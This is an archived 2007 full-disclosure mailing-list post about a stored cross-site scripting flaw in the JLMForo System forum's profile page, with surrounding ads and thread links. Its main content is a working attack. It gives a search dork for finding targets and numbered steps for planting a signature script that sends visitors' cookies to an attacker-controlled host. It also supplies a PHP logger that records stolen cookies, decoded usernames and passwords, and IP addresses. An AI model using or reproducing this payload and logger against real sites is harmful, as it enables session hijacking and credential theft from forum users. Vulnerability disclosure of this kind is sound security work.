Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability |
|---|---|
| Date: | 26 Nov 2007 21:38:21 -0000 |
# JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability # Download: # http://www.miscodigos.com/aplicaciones/JLMForo%20System/ # Bug found by Jose Luis Góngora Fernández / JosS # Contact: sys-project[at]hotmail.com # Spanish Hackers Team # www.spanish-hackers.com # /server irc.freenode.net /join #fullsecure # d0rk: "Powered By JLMForo System" # Stop lammer # Explanation Basic : 1.- Register in the forum (registro.php) 2.- Put in your signature the XSS (modificarPerfil.php) 3.- Create a subject 4.- Wait to an answer to visualize the XSS # To Rob Cookies: 1º- Register in the forum (registro.php) 2º- Put in your signature the XSS (modificarPerfil.php): <script>window.location=?http://yousite.com/xss.php?cookie=?+document.cookie</script> 3º- Upload in your Site: <?php $archivo = fopen('log2.htm','a');//Aquí podemos cambiar el nombre del archivo a crear $cookie = $_GET['c']; $usuario = $_GET['id']; $ip = getenv ('REMOTE_ADDR'); $re = $HTTPREFERRER; $fecha=date("j F, Y, g:i a"); fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br> IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>'); fclose($archivo); ?> 4º- Chmod 777 archive 5º- Create a subject 6º- Wait to an answer to run the XSS //---------------------------------------\\ Greetz To: All Hackers Jose Luis Góngora Fernández / JosS!
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Directory Traversal in SafeNet Sentinel Protection Server and Keys Server, Elliot Kendall |
|---|---|
| Next by Date: | ZDI-07-069: CA BrightStor ARCserve Backup Message Engine Insecure Method Exposure Vulnerability, zdi-disclosures |
| Previous by Thread: | Directory Traversal in SafeNet Sentinel Protection Server and Keys Server, Elliot Kendall |
| Next by Thread: | ZDI-07-069: CA BrightStor ARCserve Backup Message Engine Insecure Method Exposure Vulnerability, zdi-disclosures |
| Indexes: | [Date] [Thread] [Top] [All Lists] |